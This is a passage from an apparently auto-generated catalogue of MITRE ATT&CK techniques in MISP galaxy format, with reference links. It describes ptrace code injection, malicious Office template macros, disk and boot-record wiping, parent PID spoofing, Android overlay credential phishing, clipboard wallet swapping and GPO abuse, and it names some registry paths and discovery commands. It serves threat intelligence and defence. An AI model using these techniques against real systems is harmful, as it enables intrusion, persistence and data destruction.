https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules

https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac

https://www.us-cert.gov/ncas/alerts/TA18-086A

Ptrace System Calls - T1631.001

Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.

Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (e.g., by using malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target process’s memory (e.g., the current address of the next instruction).(Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018)

Ptrace system call injection may not be possible when targeting processes with high-privileges, and on some systems those that are non-child processes.(Citation: BH Linux Inject)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Ptrace System Calls - T1631.001"

Table 5698. Table References

Links

http://man7.org/linux/man-pages/man2/ptrace.2.html

https://attack.mitre.org/techniques/T1631/001

https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf

https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be

Office Template Macros - T1137.001

Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)

Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019)

Word Normal.dotm location:<br> <code>C:\Users&lt;username>\AppData\Roaming\Microsoft\Templates\Normal.dotm</code>

Excel Personal.xlsb location:<br> <code>C:\Users&lt;username>\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB</code>

Adversaries may also change the location of the base template to point to their own by hijacking the application’s search order, e.g. Word 2016 will first look for Normal.dotm under <code>C:\Program Files (x86)\Microsoft Office\root\Office16\</code>, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019)

An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.

The tag is: misp-galaxy:mitre-attack-pattern="Office Template Macros - T1137.001"

Table 5699. Table References

Links

http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/

https://attack.mitre.org/techniques/T1137/001

https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/

https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746

https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943

https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office

https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea

https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique

System Language Discovery - T1614.001

Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)

There are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019)

For example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language</code> or parsing the outputs of Windows API functions <code>GetUserDefaultUILanguage</code>, <code>GetSystemDefaultUILanguage</code>, <code>GetKeyboardLayoutList</code> and <code>GetUserDefaultLangID</code>.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018)

On a macOS or Linux system, adversaries may query <code>locale</code> to retrieve the value of the <code>$LANG</code> environment variable.

The tag is: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001"

Table 5700. Table References

Links

https://attack.mitre.org/techniques/T1614/001

https://securelist.com/evolution-of-jsworm-ransomware/102428/

https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware

https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/

Transmitted Data Manipulation - T1641.001

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact.

One method to achieve [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) is by modifying the contents of the device clipboard. Malicious applications may monitor clipboard activity through the ClipboardManager.OnPrimaryClipChangedListener interface on Android to determine when clipboard contents have changed. Listening to clipboard activity, reading clipboard contents, and modifying clipboard contents requires no explicit application permissions and can be performed by applications running in the background. However, this behavior has changed with the release of Android 10.

Adversaries may use [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) to replace text prior to being pasted. For example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control.

[Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) was seen within the Android/Clipper.C trojan. This sample was detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1641.001"

Table 5701. Table References

Links

https://attack.mitre.org/techniques/T1641/001

https://www.eset.com/uk/about/newsroom/press-releases/first-clipper-malware-discovered-on-google-play-1/

Dead Drop Resolver - T1481.001

Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis, or enable operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1481.001"

Table 5702. Table References

Links

https://attack.mitre.org/techniques/T1481/001

Security Software Discovery - T1418.001

Adversaries may attempt to get a listing of security applications and configurations that are installed on a device. This may include things such as mobile security products. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1418/001) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions.

The tag is: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1418.001"

Table 5703. Table References

Links

https://attack.mitre.org/techniques/T1418/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html

Disk Content Wipe - T1561.001

Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001"

Table 5704. Table References

Links

https://attack.mitre.org/techniques/T1561/001

https://docs.microsoft.com/sysinternals/downloads/sysmon

https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

https://www.justice.gov/opa/press-release/file/1092091/download

Security Software Discovery - T1518.001

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.

Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the <code>DescribeSecurityGroups</code> action with various request parameters. (Citation: DescribeSecurityGroups - Amazon Elastic Compute Cloud)

The tag is: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001"

Table 5705. Table References

Links

https://attack.mitre.org/techniques/T1518/001

https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html

https://expel.io/blog/finding-evil-in-aws/

Determine Physical Locations - T1591.001

Adversaries may gather the victim’s physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).

The tag is: misp-galaxy:mitre-attack-pattern="Determine Physical Locations - T1591.001"

Table 5706. Table References

Links

https://attack.mitre.org/techniques/T1591/001

https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

https://www.sec.gov/edgar/search-and-access

LNK Icon Smuggling - T1027.012

Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the IconEnvironmentDataBlock) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory.

Adversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., [Malicious File](https://attack.mitre.org/techniques/T1204/002)), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by [Command and Scripting Interpreter](System Binary Proxy Execution(https://attack.mitre.org/techniques/T1218) arguments within the target path field of the LNK.(Citation: Unprotect Shortcut)(Citation: Booby Trap Shortcut 2017)

LNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads.

The tag is: misp-galaxy:mitre-attack-pattern="LNK Icon Smuggling - T1027.012"

Table 5707. Table References

Links

https://attack.mitre.org/techniques/T1027/012

https://unprotect.it/technique/shortcut-hiding/

https://www.uperesia.com/booby-trapped-shortcut

GUI Input Capture - T1417.002

Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt. The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices)

There are several approaches adversaries may use to mimic this functionality. Adversaries may impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and, when installed on the device, may prompt the user for sensitive information.(Citation: eset-finance) Adversaries may also send fake device notifications to the user that may trigger the display of an input prompt when clicked.(Citation: Group IB Gustuff Mar 2019)

Additionally, adversaries may display a prompt on top of a running, legitimate application to trick users into entering sensitive information into a malicious application rather than the legitimate application. Typically, adversaries need to know when the targeted application and the individual activity within the targeted application is running in the foreground to display the prompt at the proper time. Adversaries can abuse Android’s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Two known approaches to displaying a prompt include:

  • Adversaries start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)

  • Adversaries create an application overlay window on top of a running legitimate application. Applications must hold the SYSTEM_ALERT_WINDOW permission to create overlay windows. This permission is handled differently than typical Android permissions and, at least under certain conditions, is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The SYSTEM_ALERT_WINDOW permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)

The tag is: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1417.002"

Table 5708. Table References

Links

http://cloak-and-dagger.org/

http://w2spconf.com/2011/papers/felt-mobilephishing.pdf

https://attack.mitre.org/techniques/T1417/002

https://conference.hitb.org/hitbsecconf2011kul/materials/D1T1%20-%20Riley%20Hassell%20-%20Exploiting%20Androids%20for%20Fun%20and%20Profit.pdf

https://developer.android.com/guide/components/activities/background-starts

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html

https://www.group-ib.com/blog/gustuff

https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/

https://www.skycure.com/blog/accessibility-clickjacking/

https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html

https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/

https://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/

Credentials In Files - T1552.001

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)

In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)

The tag is: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001"

Table 5709. Table References

Links

http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx

http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html

https://attack.mitre.org/techniques/T1552/001

https://posts.specterops.io/head-in-the-clouds-bd038bb69e48

https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

Disk Structure Wipe - T1561.002

Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.

On a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as format.(Citation: format_cmd_cisco)

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002"

Table 5710. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/

https://attack.mitre.org/techniques/T1561/002

https://docs.microsoft.com/sysinternals/downloads/sysmon

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf

https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668

https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html

https://www.symantec.com/connect/blogs/shamoon-attacks

Device Administrator Permissions - T1626.001

Adversaries may abuse Android’s device administration API to obtain a higher degree of control over the device. By abusing the API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642), factory resetting the device for [File Deletion](https://attack.mitre.org/techniques/T1630/002) and to delete any traces of the malware, disabling all the device’s cameras, or to make it more difficult to uninstall the app.

Device administrators must be approved by the user at runtime, with a system popup showing which actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.

The tag is: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1626.001"

Table 5711. Table References

Links

https://attack.mitre.org/techniques/T1626/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html

Suppress Application Icon - T1628.001

A malicious application could suppress its icon from being displayed to the user in the application launcher. This hides the fact that it is installed, and can make it more difficult for the user to uninstall the application. Hiding the application’s icon programmatically does not require any special permissions.

This behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker)

Beginning in Android 10, changes were introduced to inhibit malicious applications’ ability to hide their icon. If an app is a system app, requests no permissions, or does not have a launcher activity, the application’s icon will be fully hidden. Further, if the device is fully managed or the application is in a work profile, the icon will be fully hidden. Otherwise, a synthesized activity is shown, which is a launcher icon that represents the app’s details page in the system settings. If the user clicks the synthesized activity in the launcher, they are taken to the application’s details page in the system settings.(Citation: Android 10 Limitations to Hiding App Icons)(Citation: LauncherApps getActivityList)

The tag is: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1628.001"

Table 5712. Table References

Links

https://attack.mitre.org/techniques/T1628/001

https://developer.android.com/reference/kotlin/android/content/pm/LauncherApps#getactivitylist

https://source.android.com/setup/start/android-10-release#limitations_to_hiding_app_icons

https://www.cyber.nj.gov/threat-profiles/android-malware-variants/bankbot-spybanker

https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/

https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/

Prevent Application Removal - T1629.001

Adversaries may abuse the Android device administration API to prevent the user from uninstalling a target application. In earlier versions of Android, device administrator applications needed their administration capabilities explicitly deactivated by the user before the application could be uninstalled. This was later updated so the user could deactivate and uninstall the administrator application in one step.

Adversaries may also abuse the device accessibility APIs to prevent removal. This set of APIs allows the application to perform certain actions on behalf of the user and programmatically determine what is being shown on the screen. The malicious application could monitor the device screen for certain modals (e.g., the confirmation modal to uninstall an application) and inject screen input or a back button tap to close the modal. For example, Android’s performGlobalAction(int) API could be utilized to prevent the user from removing the malicious application from the device after installation. If the user wants to uninstall the malicious application, two cases may occur, both preventing the user from removing the application.

  • Case 1: If the integer argument passed to the API call is 2 or GLOBAL_ACTION_HOME, the malicious application may direct the user to the home screen from settings screen

  • Case 2: If the integer argument passed to the API call is 1 or GLOBAL_ACTION_BACK, the malicious application may emulate the back press event

The tag is: misp-galaxy:mitre-attack-pattern="Prevent Application Removal - T1629.001"

Table 5713. Table References

Links

https://attack.mitre.org/techniques/T1629/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html

Parent PID Spoofing - T1134.004

Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)

Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](Rundll32(https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)

Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1134.004"

Table 5714. Table References

Links

https://attack.mitre.org/techniques/T1134/004

https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/

https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/

https://blog.xpnsec.com/becoming-system/

https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags

https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works

https://www.countercept.com/blog/detecting-parent-pid-spoofing/

https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3

Outlook Home Page - T1137.004

Adversaries may abuse Microsoft Outlook’s Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)

Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)

The tag is: misp-galaxy:mitre-attack-pattern="Outlook Home Page - T1137.004"

Table 5715. Table References

Links

https://attack.mitre.org/techniques/T1137/004

https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack

https://github.com/sensepost/notruler

https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/

Identify Business Tempo - T1591.003

Adversaries may gather information about the victim’s business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))

The tag is: misp-galaxy:mitre-attack-pattern="Identify Business Tempo - T1591.003"

Table 5716. Table References

Links

https://attack.mitre.org/techniques/T1591/003

https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

Domain Generation Algorithms - T1637.001

Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1637/001) (DGAs) to procedurally generate domain names for uses such as command and control communication or malicious application distribution.(Citation: securelist rotexy 2018)

DGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there could potentially be thousands of domains that malware can check for instructions.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1637.001"

Table 5717. Table References

Links

https://attack.mitre.org/techniques/T1637/001

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/

Group Policy Modification - T1484.001

Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path \<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)

Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.

Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)

For example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <code><GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml</code>.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code><GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary’s control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)

